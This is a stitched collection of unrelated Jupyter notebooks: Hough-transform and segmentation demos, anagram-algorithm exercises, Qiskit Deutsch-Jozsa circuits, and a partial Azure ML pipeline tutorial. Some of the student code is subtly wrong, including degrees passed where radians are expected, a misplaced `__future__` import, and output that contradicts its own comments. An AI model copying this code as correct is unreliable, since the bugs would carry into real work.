white_region = np.where(img < k)
img[black_region] = 0
img[white_region] = 255
fig, (ax1, ax2) = plt.subplots(1, 2)
fig.set_figwidth(10)
ax1.set_title(f'When k={k}')
ax1.imshow(img, cmap='gray')
plt.plot(k, entropies[k], 'go')
ax2.plot(entropies)
ax2.set_title('Entropies')
ax2.set_xlabel(f'k')
_ = ax2.set_ylabel('H(k)')
###Output
_____no_output_____
###Markdown
Line Hough transform
###Code
import sys
import math
import cv2
import numpy as np
import matplotlib.pyplot as plt
from __future__ import print_function
from ipywidgets import interact
import ipywidgets as widgets
def hough_transform(canny_abajo, canny_arriba, umbral_lineas):
image_color = cv2.imread("images/cuadrado.png")
image = cv2.cvtColor(image_color, cv2.COLOR_BGR2GRAY)
bordes = cv2.Canny(image, canny_abajo, canny_arriba)
(w,h) = image.shape
diagonal = math.ceil(math.sqrt(w ** 2 + h** 2))
espacio_p = np.zeros((diagonal, 181))
for i in range(w):
for j in range(h):
if bordes[i][j] != 0:
for t in range(-90, 90+1):
p = (i * math.cos(t)) + (j * math.sin(t))
espacio_p[math.floor(p)][t+90] += 1
lineas = np.argwhere(espacio_p > umbral_lineas)
for (p,theta) in lineas:
a = math.sin(theta-90)
b = math.cos(theta-90)
x = a*p
y = b*p
p1 = (math.floor(x+1000*(-b)), math.floor(y+1000*a))
p2 = (math.floor(x-1000*(-b)), math.floor(y-1000*a))
cv2.line(image_color, p1, p2, (0,255,0))
plt.imshow(cv2.cvtColor(image_color, cv2.COLOR_BGR2RGB))
plt.show()
_ = interact(
hough_transform,
canny_abajo=widgets.IntSlider(min=0,max=255,step=1,value=100),
canny_arriba=widgets.IntSlider(min=0,max=255,step=1,value=200),
umbral_lineas=widgets.IntSlider(min=0,max=255,step=1,value=70)
)
###Output
_____no_output_____
###Markdown
Circle Hough transform
###Code
import sys
import math
import cv2
import numpy as np
import matplotlib.pyplot as plt
from __future__ import print_function
from ipywidgets import interact
import ipywidgets as widgets
def circle_hough_transform(canny_abajo, canny_arriba, umbral_circulos, radio_estimado):
image_color = cv2.imread("images/circulos.jpg")
image = cv2.cvtColor(image_color, cv2.COLOR_BGR2GRAY)
bordes = cv2.Canny(image, canny_abajo, canny_arriba)
(w, h) = image.shape
espacio_p = np.zeros((w+1,h+1))
for i in range(w):
for j in range(h):
if bordes[i][j] != 0:
for t in range(0, 360+1):
a= i - (radio_estimado*math.cos(t))
b= j - (radio_estimado*math.sin(t))
if (a>=0 and b>=0 and a<=w-1 and b<=h-1):
espacio_p[math.floor(a), math.floor(b)] += 1
circulo_centros = np.argwhere(espacio_p > umbral_circulos)
for centro in circulo_centros:
cv2.circle(image_color, tuple(reversed(centro)), radio_estimado, (0,160,277))
plt.imshow(cv2.cvtColor(image_color, cv2.COLOR_BGR2RGB))
plt.show()
_ = interact(
circle_hough_transform,
canny_abajo=widgets.IntSlider(min=0, max=255, step=1, value=100),
canny_arriba=widgets.IntSlider(min=0, max=255, step=1, value=200),
umbral_circulos=widgets.IntSlider(min=0, max=255, step=1, value=40),
radio_estimado=widgets.IntSlider(min=0, max=255, step=1, value=100)
)
###Output
_____no_output_____
###Markdown
Custom BFS-based segmentation algorithm. Note that this algorithm is very slow.
###Code
import sys
import queue
import random
import cv2
import numpy as np
import matplotlib.pyplot as plt
from __future__ import print_function
from ipywidgets import interact
import ipywidgets as widgets
class Explorador:
def __init__(self, imagen, d):
self.imagen = imagen
self.d = d
self.vecindario = 1
self.vecindarios = np.zeros(imagen.shape, dtype=np.int64)
self.w,self.h = self.imagen.shape
self.cola = queue.Queue()
def movimiento_valido(self, m, n):
return m >= 0 and n >= 0 and m <= self.w - 1 and n <= self.h - 1
def es_vecino(self, actual, siguiente):
return siguiente <= actual + self.d and siguiente >= actual - self.d
def explorado(self, m, n):
return self.vecindarios[m, n] != 0
def busqueda(self, m, n):
self.vecindarios[m,n] = self.vecindario
self.cola.put((m, n))
while not self.cola.empty():
x,y = self.cola.get()
for direccion_x, direccion_y in [(1, 0),(-1, 0),(0, 1),(0, -1)]:
movimiento_x = x + direccion_x
movimiento_y = y + direccion_y
if self.movimiento_valido(movimiento_x, movimiento_y) and \
(not self.explorado(movimiento_x, movimiento_y)) and \
self.es_vecino(self.imagen[x,y], self.imagen[movimiento_x,movimiento_y]):
self.vecindarios[movimiento_x,movimiento_y] = self.vecindario
self.cola.put((movimiento_x,movimiento_y))
def descubrir_vecindarios(self):
for x in range(self.w):
for y in range(self.h):
if self.vecindarios[x,y] == 0: # 0 es no se ha visitado
self.busqueda(x,y)
self.vecindario+=1
return self.vecindarios
def vecindarios_coloreados(imagen):
color = lambda: (random.randint(0,255),random.randint(0,255),random.randint(0,255))
w,h = imagen.shape
coloreada = np.zeros((w,h,3), np.uint8)
num_vecindarios = np.amax(imagen)
for vecindario in range(num_vecindarios + 1):
coloreada[np.where(imagen == (vecindario + 1))] = color()
return coloreada
def descubrir_vecindarios(d):
imagen = cv2.imread("images/lena.png", 0)
e = Explorador(imagen, d)
resultado = e.descubrir_vecindarios()
plt.imshow(cv2.cvtColor(vecindarios_coloreados(resultado), cv2.COLOR_BGR2RGB))
plt.show()
descubrir_vecindarios(3)
###Output
_____no_output_____
###Markdown
Algorithms *Data Structures and Information Retrieval in Python* Copyright 2021 Allen Downey. License: [Creative Commons Attribution-NonCommercial-ShareAlike 4.0 International](https://creativecommons.org/licenses/by-nc-sa/4.0/) Searching for anagrams. In this notebook we'll implement algorithms for two tasks:* Testing a pair of words to see if they are anagrams of each other, that is, if you can rearrange the letters in one word to spell the other.* Searching a list of words for all pairs that are anagrams of each other. There is a point to these examples, which I will explain at the end. **Exercise 1:** Write a function that takes two words and returns `True` if they are anagrams. Test your function with the examples below.
###Code
from collections import Counter
def is_anagram(word1, word2):
return sorted(word1) == sorted(word2)
%timeit is_anagram('tachymetric', 'mccarthyite')
is_anagram('tachymetric', 'mccarthyite') # True
is_anagram('post', 'top') # False, letter not present
is_anagram('pott', 'top') # False, letter present but not enough copies
is_anagram('top', 'post') # False, letters left over at the end
###Output
_____no_output_____
###Markdown
**Exercise 2:** Use `timeit` to see how fast your function is for these examples:
###Code
%timeit is_anagram('tops', 'spot')
%timeit is_anagram('tachymetric', 'mccarthyite')
###Output
751 ns ± 3.52 ns per loop (mean ± std. dev. of 7 runs, 1000000 loops each)
###Markdown
NOTE: How can we compare algorithms running on different computers? Searching for anagram pairs **Exercise 3:** Write a function that takes a word list and returns a list of all anagram pairs.
###Code
short_word_list = ['proudest', 'stop', 'pots', 'tops', 'sprouted']
for i,j in enumerate(short_word_list):
print(i,j)
def all_anagram_pairs(word_list):
## Step1
lengths = {}
for i in word_list:
n = len(i)
if n in lengths:
lengths[n] += [i]
else:
lengths[n] = [i]
pairs = []
## Step2
for key,val in enumerate(word_list):
length = len(val)
for i in lengths[length]:
if is_anagram(val,i) and val !=i and sorted([val,i]) not in pairs:
pairs.append(sorted([val,i]))
return pairs
# Solution goes here
all_anagram_pairs(short_word_list)
###Output
_____no_output_____
###Markdown
The following cell downloads a file containing a list of English words.
###Code
from os.path import basename, exists
def download(url):
filename = basename(url)
if not exists(filename):
from urllib.request import urlretrieve
local, _ = urlretrieve(url, filename)
print('Downloaded ' + local)
download('https://github.com/AllenDowney/DSIRP/raw/main/american-english')
###Output
_____no_output_____
###Markdown
The following function reads a file and returns a set of words (I used a set because after we convert words to lower case, there are some repeats.)
###Code
def read_words(filename):
"""Read lines from a file and split them into words."""
res = set()
for line in open(filename):
for word in line.split():
res.add(word.strip().lower())
return res
word_list = read_words('american-english')
len(word_list)
###Output
_____no_output_____
###Markdown
**Exercise 4:** Loop through the word list and print all words that are anagrams of `stop`.
###Code
for i in word_list:
if is_anagram(i,'stop'):
print(i)
###Output
stop
spot
tops
pots
opts
post
###Markdown
Now run `all_anagram_pairs` with the full `word_list`:
###Code
pairs = all_anagram_pairs([*word_list]) ## convert the set to a list first, since a set is not subscriptable
###Output
_____no_output_____
###Markdown
**Exercise 5:** While that's running, let's estimate how long it's going to take.
###Code
%time all_anagram_pairs(word_list) ## TypeError: 'set' object is not subscriptable
###Output
CPU times: user 26.6 ms, sys: 2.75 ms, total: 29.3 ms
Wall time: 28.9 ms
###Markdown
A better algorithm**Exercise 6:** Write a better algorithm! Hint: make a dictionary. How much faster is your algorithm?
###Code
def all_anagram_lists(word_list):
"""Finds all anagrams in a list of words.
word_list: sequence of strings
"""
## Step1
lengths = {}
for i in word_list:
n = len(i)
if n in lengths:
lengths[n] += [i]
else:
lengths[n] = [i]
pairs_list = {}
## Step2
for key,val in enumerate(word_list):
length = len(val)
for i in lengths[length]:
if is_anagram(val,i) and val !=i:
if val in pairs_list:
pairs_list[val].append(i)
else:
pairs_list[val] = [i]
if key%100 == 0:
print(key)
return pairs_list
pairs = all_anagram_lists([*word_list])
%time anagram_map = all_anagram_lists(word_list)
len(anagram_map)
# Solution goes here
###Output
_____no_output_____
###Markdown
SummaryWhat is the point of the examples in this notebook?* The different versions of `is_anagram` show that, when inputs are small, it is hard to say which algorithm will be the fastest. It often depends on details of the implementation. Anyway, the differences tend to be small, so it might not matter much in practice.* The different algorithms we used to search for anagram pairs show that, when inputs are large, we can often tell which algorithm will be fastest. And the difference between a fast algorithm and a slow one can be huge! ExercisesBefore you work on these exercises, you might want to read the Python [Sorting How-To](https://docs.python.org/3/howto/sorting.html). It uses `lambda` to define an anonymous function, which [you can read about here](https://www.w3schools.com/python/python_lambda.asp).**Exercise 7:**Make a dictionary like `anagram_map` that contains only keys that map to a list with more than one element. You can use a `for` loop to make a new dictionary, or a [dictionary comprehension](https://www.freecodecamp.org/news/dictionary-comprehension-in-python-explained-with-examples/).
###Code
# Solution goes here
###Output
_____no_output_____
###Markdown
**Exercise 8:**Find the longest word with at least one anagram. Suggestion: use the `key` argument of `sort` or `sorted` ([see here](https://stackoverflow.com/questions/8966538/syntax-behind-sortedkey-lambda)).
###Code
# Solution goes here
###Output
_____no_output_____
###Markdown
**Exercise 9:**Find the largest list of words that are anagrams of each other.
###Code
# Solution goes here
###Output
_____no_output_____
###Markdown
**Exercise 10:**Write a function that takes an integer `word_length` and finds the longest list of words with the given length that are anagrams of each other.
###Code
# Solution goes here
# Solution goes here
###Output
_____no_output_____
###Markdown
**Exercise 11:**At this point we have a data structure that contains lists of words that are anagrams, but we have not actually enumerated all pairs.Write a function that takes `anagram_map` and returns a list of all anagram pairs.How many are there?
###Code
# Solution goes here
# Solution goes here
# Solution goes here
# Solution goes here
###Output
_____no_output_____
###Markdown
Quantum Algorithms using Qiskit
###Code
%matplotlib inline
import numpy as np
import matplotlib.pyplot as plt
from matplotlib import cm
# Importing standard Qiskit libraries and configuring account
from qiskit import QuantumCircuit, execute
from qiskit.providers.aer import QasmSimulator, StatevectorSimulator
from qiskit.visualization import *
from qiskit.quantum_info import *
###Output
_____no_output_____
###Markdown
The Hadamard operation on multiple qubits Creating Equal Superpositions. The $n$-qubit $|0_n\rangle$ state denotes a state where all qubits are in the $|0\rangle$ state. It is sometimes also written as $|0^{\otimes n}\rangle$. We've seen that the Hadamard transformation can create equal superposition states starting from the $|0\rangle$ state. $$H|0\rangle = \frac{1}{\sqrt{2}} (|0\rangle +|1\rangle)$$Similarly, the transformation $H\otimes H \equiv H^{\otimes 2}$ can create a uniform superposition of all two-qubit basis states starting from the $|00\rangle$ state.$$(H \otimes H) |00\rangle = \frac{1}{\sqrt{2}} (|0\rangle +|1\rangle) \otimes \frac{1}{\sqrt{2}} (|0\rangle +|1\rangle) = \frac{1}{2}(|00\rangle+|01\rangle+|10\rangle+|11\rangle)= \frac{1}{2}(|0\rangle+|1\rangle+|2\rangle+|3\rangle)$$Thus, for the case of $n$ qubits, the operation $H^{\otimes n}$ creates a uniform superposition of all $n$-qubit basis states starting from the $|0^{\otimes n}\rangle$ state.$$H^{\otimes n}|0^{\otimes n}\rangle = \frac{1}{2^{n/2}}\sum\limits_{i=0}^{2^n-1} |i\rangle$$ Self-inversion of the Hadamard Transformation. We already know that the $H$ gate is self-adjoint, which also means it is its own inverse. It is easy to see that the Hadamard transformation on $n$ qubits also has the same property. For two qubits, $$ |00\rangle \xrightarrow{(H \otimes H)} \frac{1}{2}(|0\rangle+|1\rangle+|2\rangle+|3\rangle) \xrightarrow{(H \otimes H)} |00\rangle $$In general, $$ |0^{\otimes n}\rangle \xrightarrow{H^{\otimes n}} \frac{1}{2^{n/2}}\sum\limits_{i=0}^{2^n-1} |i\rangle \xrightarrow{H^{\otimes n}} |0^{\otimes n}\rangle $$This is true not only for the $|00\rangle$ state, but for all states. For example, consider the two qubit state $|01\rangle$$$ |01\rangle \xrightarrow{(H \otimes H)} \frac{1}{2}(|00\rangle-|01\rangle+|10\rangle-|11\rangle) \xrightarrow{(H \otimes H)} |01\rangle $$ The effect of the Hadamard Transformation on general states. The general effect of the Hadamard transformation on a general state $|x\rangle$ is given as$$H^{\otimes n}|x\rangle = \frac{1}{2^{n/2}}\sum\limits_{y=0}^{2^n-1}(-1)^{x\cdot y}|y\rangle$$where $x\cdot y = x_0\cdot y_0 \oplus x_1\cdot y_1 \oplus \cdots \oplus x_{n-1}\cdot y_{n-1}$. So, the Hadamard transformation will take ONLY the uniform superposition with no relative phases to the $|0^{\otimes n}\rangle$ state.
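Before looking at phases, here is a quick numerical check (a small sketch using the `Statevector` class from `qiskit.quantum_info`) that $H^{\otimes 2}|00\rangle$ really has amplitude $\frac{1}{2}$ on every basis state:

```python
# Quick check: H on both qubits of |00> gives amplitude 1/2 on all four basis states
from qiskit import QuantumCircuit
from qiskit.quantum_info import Statevector

qc = QuantumCircuit(2)
qc.h([0, 1])
print(Statevector.from_instruction(qc))
```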
###Code
qch = QuantumCircuit(3)
# State Preparation
qch.h(range(3))
qch.barrier()
qch.z(1)
qch.barrier()
# qch.h(range(3))
qch.draw(output='mpl')
jobh = execute(qch.reverse_bits(), backend=StatevectorSimulator())
sv = jobh.result().get_statevector()
mods = np.absolute(sv)
phases = np.angle(sv)
colors = cm.brg(phases/(2*np.pi))
plt.title('Statevector')
plt.bar(range(8), mods, color=colors)
###Output
_____no_output_____
###Markdown
Oracles The action of a bit oracle is $|x\rangle|0\rangle \xrightarrow{U_f} |x\rangle|f(x)\rangle$. The action of a phase oracle is $|x\rangle|-\rangle \xrightarrow{U_f} (-1)^{f(x)}|x\rangle|-\rangle$. 1-bit Boolean function Oracles. Below are the truth tables for all four 1-bit Boolean functions. | x | $f_0$ | $f_1$ | $f_2$ | $f_3$ ||--- |---------- |---------- |---------- |---------- || 0 | 0 | 0 | 1 | 1 || 1 | 0 | 1 | 0 | 1 | We will now make bit-oracles for each of these
###Code
f0_oracle = QuantumCircuit(2)
f0_oracle.draw(output='mpl')
f1_oracle = QuantumCircuit(2)
f1_oracle.cx(0,1)
f1_oracle.draw(output='mpl')
f2_oracle = QuantumCircuit(2)
f2_oracle.x(0)
f2_oracle.cx(0,1)
f2_oracle.x(0)
f2_oracle.draw(output='mpl')
f3_oracle = QuantumCircuit(2)
f3_oracle.x(1)
f3_oracle.draw(output='mpl')
###Output
_____no_output_____
###Markdown
Deutsch Algorithm. The action of a bit oracle is $\frac{1}{\sqrt{2}}(|0\rangle + |1\rangle)\otimes |0\rangle \xrightarrow{U_f} \frac{1}{\sqrt{2}}(|0\rangle|f(0)\rangle + |1\rangle|f(1)\rangle) $. The action of a phase oracle is $\frac{1}{\sqrt{2}}(|0\rangle + |1\rangle)\otimes |-\rangle \xrightarrow{U_f} \frac{1}{\sqrt{2}}((-1)^{f(0)}|0\rangle + (-1)^{f(1)}|1\rangle)\otimes |-\rangle $.
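To see where the phase-oracle behaviour comes from, apply the bit oracle $U_f|x\rangle|y\rangle = |x\rangle|y\oplus f(x)\rangle$ to an ancilla prepared in $|-\rangle$:$$U_f |x\rangle|-\rangle = |x\rangle \otimes \frac{1}{\sqrt{2}}\big(|0\oplus f(x)\rangle - |1\oplus f(x)\rangle\big) = (-1)^{f(x)}|x\rangle|-\rangle$$since swapping $|0\rangle$ and $|1\rangle$ in $|-\rangle$ only flips its sign. This phase kickback is why the circuit below prepares the last qubit in the $|-\rangle$ state (an $X$ followed by an $H$).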
###Code
qc_d = QuantumCircuit(2,1) # (num_qubits, num_bits)
# last qubit in state |1>
qc_d.x(1)
# Hadamard everything before
qc_d.h(range(2))
qc_d.barrier()
# Extend the citcuit with the oracle here
qc_d.extend(f1_oracle)
qc_d.barrier()
# Hadamard everything after
qc_d.h(range(2))
# Measure all but the last qubit
qc_d.measure(0,0)
qc_d.draw(output='mpl')
job_d = execute(qc_d.reverse_bits(), backend=QasmSimulator(), shots=1024)
plot_histogram(job_d.result().get_counts())
###Output
_____no_output_____
###Markdown
Deutsch-Jozsa Algorithm. This is the multi-qubit generalisation of the Deutsch algorithm. The procedure is exactly the same as the Deutsch algorithm. $$\left(\frac{1}{2^{n/2}}\sum\limits_{x=0}^{2^n-1} |x\rangle \right) \otimes |-\rangle \xrightarrow{U_f}\left(\frac{1}{2^{n/2}}\sum\limits_{x=0}^{2^n-1} (-1)^{f(x)}|x\rangle \right) \otimes |-\rangle $$The important underlying idea is that only the constant function imparts equal phase shifts to all the basis state components, and hence the final Hadamard transformation will result in the $|0^{\otimes n}\rangle$ state. Two-bit Boolean function oracles. Let us construct oracles for one constant function $f_c$ and one balanced function $f_b$. | $x_1$ | $x_0$ | $f_c$ | $f_b$ ||------- |------- |------- |------- || 0 | 0 | 0 | 0 || 0 | 1 | 0 | 1 || 1 | 0 | 0 | 0 || 1 | 1 | 0 | 1 |
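Concretely, using $H^{\otimes n}|x\rangle = \frac{1}{2^{n/2}}\sum_{y}(-1)^{x\cdot y}|y\rangle$ from earlier, the amplitude of $|0^{\otimes n}\rangle$ after the final Hadamards is$$\frac{1}{2^{n}}\sum_{x=0}^{2^n-1}(-1)^{f(x)},$$which is $\pm 1$ for a constant function and $0$ for a balanced one, so measuring the first $n$ qubits gives all zeros with probability 1 in the constant case and probability 0 in the balanced case.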
###Code
fc_oracle = QuantumCircuit(3)
fc_oracle.draw(output='mpl')
fb_oracle = QuantumCircuit(3)
fb_oracle.cx(0,2)
fb_oracle.draw(output='mpl')
qc_dj = QuantumCircuit(3,2) # (num_qubits, num_bits)
# last qubit in state |1>
qc_dj.x(2)
# Hadamard everything before
qc_dj.h(range(3))
qc_dj.barrier()
# Extend the citcuit with the oracle here
qc_dj.extend(fb_oracle)
qc_dj.barrier()
# Hadamard everything after
qc_dj.h(range(3))
# Measure all but the last qubit
qc_dj.measure([0,1],[0,1]) # ([list of qubits], [list of bits])
qc_dj.draw(output='mpl')
job_dj = execute(qc_dj.reverse_bits(), backend=QasmSimulator(), shots=1024)
plot_histogram(job_dj.result().get_counts())
###Output
_____no_output_____
###Markdown
Algorithms [Click here to run this chapter on Colab](https://colab.research.google.com/github/AllenDowney/DSIRP/blob/main/notebooks/algorithms.ipynb) Searching for anagrams. In this notebook we'll implement algorithms for two tasks:* Testing a pair of words to see if they are anagrams of each other, that is, if you can rearrange the letters in one word to spell the other.* Searching a list of words for all pairs that are anagrams of each other. There is a point to these examples, which I will explain at the end. **Exercise 1:** Write a function that takes two words and returns `True` if they are anagrams. Test your function with the examples below.
###Code
def is_anagram(word1, word2):
return False
is_anagram('tachymetric', 'mccarthyite') # True
is_anagram('post', 'top') # False, letter not present
is_anagram('pott', 'top') # False, letter present but not enough copies
is_anagram('top', 'post') # False, letters left over at the end
is_anagram('topss', 'postt') # False
###Output
_____no_output_____
###Markdown
**Exercise 2:** Use `timeit` to see how fast your function is for these examples:
###Code
%timeit is_anagram('tops', 'spot')
%timeit is_anagram('tachymetric', 'mccarthyite')
###Output
_____no_output_____
###Markdown
How can we compare algorithms running on different computers? Searching for anagram pairs **Exercise 3:** Write a function that takes a word list and returns a list of all anagram pairs.
###Code
short_word_list = ['proudest', 'stop', 'pots', 'tops', 'sprouted']
def all_anagram_pairs(word_list):
return []
all_anagram_pairs(short_word_list)
###Output
_____no_output_____
###Markdown
The following cell downloads a file containing a list of English words.
###Code
from os.path import basename, exists
def download(url):
filename = basename(url)
if not exists(filename):
from urllib.request import urlretrieve
local, _ = urlretrieve(url, filename)
print('Downloaded ' + local)
download('https://github.com/AllenDowney/DSIRP/raw/main/american-english')
###Output
_____no_output_____
###Markdown
The following function reads a file and returns a set of words (I used a set because after we convert words to lower case, there are some repeats.)
###Code
def read_words(filename):
"""Read lines from a file and split them into words."""
res = set()
for line in open(filename):
for word in line.split():
res.add(word.strip().lower())
return res
word_list = read_words('american-english')
len(word_list)
###Output
_____no_output_____
###Markdown
**Exercise 4:** Loop through the word list and print all words that are anagrams of `stop`. Now run `all_anagram_pairs` with the full `word_list`:
###Code
# pairs = all_anagram_pairs(word_list)
###Output
_____no_output_____
###Markdown
**Exercise 5:** While that's running, let's estimate how long it's going to take. A better algorithm**Exercise 6:** Write a better algorithm! Hint: make a dictionary. How much faster is your algorithm?
###Code
def all_anagram_lists(word_list):
"""Finds all anagrams in a list of words.
word_list: sequence of strings
"""
return {}
%time anagram_map = all_anagram_lists(word_list)
len(anagram_map)
###Output
_____no_output_____ |
04 Build and operate machine learning solutions with Azure Databricks/mslearn-dp100/08 - Create a Pipeline.ipynb | ###Markdown
Create a Pipeline. You can perform the various steps required to ingest data, train a model, and register the model individually by using the Azure ML SDK to run script-based experiments. However, in an enterprise environment it is common to encapsulate the sequence of discrete steps required to build a machine learning solution into a *pipeline* that can be run on one or more compute targets; either on-demand by a user, from an automated build process, or on a schedule. In this notebook, you'll bring together all of these elements to create a simple pipeline that pre-processes data and then trains and registers a model. Connect to your workspace. To get started, connect to your workspace.> **Note**: If you haven't already established an authenticated session with your Azure subscription, you'll be prompted to authenticate by clicking a link, entering an authentication code, and signing into Azure.
###Code
import azureml.core
from azureml.core import Workspace
# Load the workspace from the saved config file
ws = Workspace.from_config()
print('Ready to use Azure ML {} to work with {}'.format(azureml.core.VERSION, ws.name))
###Output
_____no_output_____
###Markdown
Prepare dataIn your pipeline, you'll use a dataset containing details of diabetes patients. Run the cell below to create this dataset (if you created it previously, the code will find the existing version)
###Code
from azureml.core import Dataset
default_ds = ws.get_default_datastore()
if 'diabetes dataset' not in ws.datasets:
default_ds.upload_files(files=['./data/diabetes.csv', './data/diabetes2.csv'], # Upload the diabetes csv files in /data
target_path='diabetes-data/', # Put it in a folder path in the datastore
overwrite=True, # Replace existing files of the same name
show_progress=True)
#Create a tabular dataset from the path on the datastore (this may take a short while)
tab_data_set = Dataset.Tabular.from_delimited_files(path=(default_ds, 'diabetes-data/*.csv'))
# Register the tabular dataset
try:
tab_data_set = tab_data_set.register(workspace=ws,
name='diabetes dataset',
description='diabetes data',
tags = {'format':'CSV'},
create_new_version=True)
print('Dataset registered.')
except Exception as ex:
print(ex)
else:
print('Dataset already registered.')
###Output
_____no_output_____
###Markdown
Create scripts for pipeline stepsPipelines consist of one or more *steps*, which can be Python scripts, or specialized steps like a data transfer step that copies data from one location to another. Each step can run in its own compute context. In this exercise, you'll build a simple pipeline that contains two Python script steps: one to pre-process some training data, and another to use the pre-processed data to train and register a model.First, let's create a folder for the script files we'll use in the pipeline steps.
###Code
import os
# Create a folder for the pipeline step files
experiment_folder = 'diabetes_pipeline'
os.makedirs(experiment_folder, exist_ok=True)
print(experiment_folder)
###Output
_____no_output_____
###Markdown
Now let's create the first script, which will read data from the diabetes dataset and apply some simple pre-processing to remove any rows with missing data and normalize the numeric features so they're on a similar scale.The script includes an argument named **--prepped-data**, which references the folder where the resulting data should be saved.
###Code
%%writefile $experiment_folder/prep_diabetes.py
# Import libraries
import os
import argparse
import pandas as pd
from azureml.core import Run
from sklearn.preprocessing import MinMaxScaler
# Get parameters
parser = argparse.ArgumentParser()
parser.add_argument("--input-data", type=str, dest='raw_dataset_id', help='raw dataset')
parser.add_argument('--prepped-data', type=str, dest='prepped_data', default='prepped_data', help='Folder for results')
args = parser.parse_args()
save_folder = args.prepped_data
# Get the experiment run context
run = Run.get_context()
# load the data (passed as an input dataset)
print("Loading Data...")
diabetes = run.input_datasets['raw_data'].to_pandas_dataframe()
# Log raw row count
row_count = (len(diabetes))
run.log('raw_rows', row_count)
# remove nulls
diabetes = diabetes.dropna()
# Normalize the numeric columns
scaler = MinMaxScaler()
num_cols = ['Pregnancies','PlasmaGlucose','DiastolicBloodPressure','TricepsThickness','SerumInsulin','BMI','DiabetesPedigree']
diabetes[num_cols] = scaler.fit_transform(diabetes[num_cols])
# Log processed rows
row_count = (len(diabetes))
run.log('processed_rows', row_count)
# Save the prepped data
print("Saving Data...")
os.makedirs(save_folder, exist_ok=True)
save_path = os.path.join(save_folder,'data.csv')
diabetes.to_csv(save_path, index=False, header=True)
# End the run
run.complete()
###Output
_____no_output_____
###Markdown
Now you can create the script for the second step, which will train a model. The script includes an argument named **--training-data**, which references the location where the prepared data was saved by the previous step.
###Code
%%writefile $experiment_folder/train_diabetes.py
# Import libraries
from azureml.core import Run, Model
import argparse
import pandas as pd
import numpy as np
import joblib
import os
from sklearn.model_selection import train_test_split
from sklearn.tree import DecisionTreeClassifier
from sklearn.metrics import roc_auc_score
from sklearn.metrics import roc_curve
import matplotlib.pyplot as plt
# Get parameters
parser = argparse.ArgumentParser()
parser.add_argument("--training-data", type=str, dest='training_data', help='training data')
args = parser.parse_args()
training_data = args.training_data
# Get the experiment run context
run = Run.get_context()
# load the prepared data file in the training folder
print("Loading Data...")
file_path = os.path.join(training_data,'data.csv')
diabetes = pd.read_csv(file_path)
# Separate features and labels
X, y = diabetes[['Pregnancies','PlasmaGlucose','DiastolicBloodPressure','TricepsThickness','SerumInsulin','BMI','DiabetesPedigree','Age']].values, diabetes['Diabetic'].values
# Split data into training set and test set
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.30, random_state=0)
# Train a decision tree model
print('Training a decision tree model...')
model = DecisionTreeClassifier().fit(X_train, y_train)
# calculate accuracy
y_hat = model.predict(X_test)
acc = np.average(y_hat == y_test)
print('Accuracy:', acc)
run.log('Accuracy', np.float(acc))
# calculate AUC
y_scores = model.predict_proba(X_test)
auc = roc_auc_score(y_test,y_scores[:,1])
print('AUC: ' + str(auc))
run.log('AUC', np.float(auc))
# plot ROC curve
fpr, tpr, thresholds = roc_curve(y_test, y_scores[:,1])
fig = plt.figure(figsize=(6, 4))
# Plot the diagonal 50% line
plt.plot([0, 1], [0, 1], 'k--')
# Plot the FPR and TPR achieved by our model
plt.plot(fpr, tpr)
plt.xlabel('False Positive Rate')
plt.ylabel('True Positive Rate')
plt.title('ROC Curve')
run.log_image(name = "ROC", plot = fig)
plt.show()
# Save the trained model in the outputs folder
print("Saving model...")
os.makedirs('outputs', exist_ok=True)
model_file = os.path.join('outputs', 'diabetes_model.pkl')
joblib.dump(value=model, filename=model_file)
# Register the model
print('Registering model...')
Model.register(workspace=run.experiment.workspace,
model_path = model_file,
model_name = 'diabetes_model',
tags={'Training context':'Pipeline'},
properties={'AUC': np.float(auc), 'Accuracy': np.float(acc)})
run.complete()
###Output
_____no_output_____
###Markdown
Prepare a compute environment for the pipeline stepsIn this exercise, you'll use the same compute for both steps, but it's important to realize that each step is run independently, so you could specify different compute contexts for each step if appropriate.First, get the compute target you created in a previous lab (if it doesn't exist, it will be created).> **Important**: Change *your-compute-cluster* to the name of your compute cluster in the code below before running it! Cluster names must be globally unique and between 2 and 16 characters in length. Valid characters are letters, digits, and the - character.
###Code
from azureml.core.compute import ComputeTarget, AmlCompute
from azureml.core.compute_target import ComputeTargetException
cluster_name = "your-compute-cluster"
try:
# Check for existing compute target
pipeline_cluster = ComputeTarget(workspace=ws, name=cluster_name)
print('Found existing cluster, use it.')
except ComputeTargetException:
# If it doesn't already exist, create it
try:
compute_config = AmlCompute.provisioning_configuration(vm_size='STANDARD_DS11_V2', max_nodes=2)
pipeline_cluster = ComputeTarget.create(ws, cluster_name, compute_config)
pipeline_cluster.wait_for_completion(show_output=True)
except Exception as ex:
print(ex)
###Output
_____no_output_____
###Markdown
> **Note**: Compute instances and clusters are based on standard Azure virtual machine images. For this exercise, the *Standard_DS11_v2* image is recommended to achieve the optimal balance of cost and performance. If your subscription has a quota that does not include this image, choose an alternative image; but bear in mind that a larger image may incur higher cost and a smaller image may not be sufficient to complete the tasks. Alternatively, ask your Azure administrator to extend your quota.The compute will require a Python environment with the necessary package dependencies installed.
###Code
%%writefile $experiment_folder/experiment_env.yml
name: experiment_env
dependencies:
- python=3.6.2
- scikit-learn
- ipykernel
- matplotlib
- pandas
- pip
- pip:
- azureml-defaults
- pyarrow
###Output
_____no_output_____
###Markdown
Now that you have a Conda configuration file, you can create an environment and use it in the run configuration for the pipeline.
###Code
from azureml.core import Environment
from azureml.core.runconfig import RunConfiguration
# Create a Python environment for the experiment (from a .yml file)
experiment_env = Environment.from_conda_specification("experiment_env", experiment_folder + "/experiment_env.yml")
# Register the environment
experiment_env.register(workspace=ws)
registered_env = Environment.get(ws, 'experiment_env')
# Create a new runconfig object for the pipeline
pipeline_run_config = RunConfiguration()
# Use the compute you created above.
pipeline_run_config.target = pipeline_cluster
# Assign the environment to the run configuration
pipeline_run_config.environment = registered_env
print ("Run configuration created.")
###Output
_____no_output_____
###Markdown
Create and run a pipelineNow you're ready to create and run a pipeline.First you need to define the steps for the pipeline, and any data references that need to be passed between them. In this case, the first step must write the prepared data to a folder that can be read from by the second step. Since the steps will be run on remote compute (and in fact, could each be run on different compute), the folder path must be passed as a data reference to a location in a datastore within the workspace. The **OutputFileDatasetConfig** object is a special kind of data reference that is used for interim storage locations that can be passed between pipeline steps, so you'll create one and use it as the output for the first step and the input for the second step. Note that you need to pass it as a script argument so your code can access the datastore location referenced by the data reference.
###Code
from azureml.data import OutputFileDatasetConfig
from azureml.pipeline.steps import PythonScriptStep
# Get the training dataset
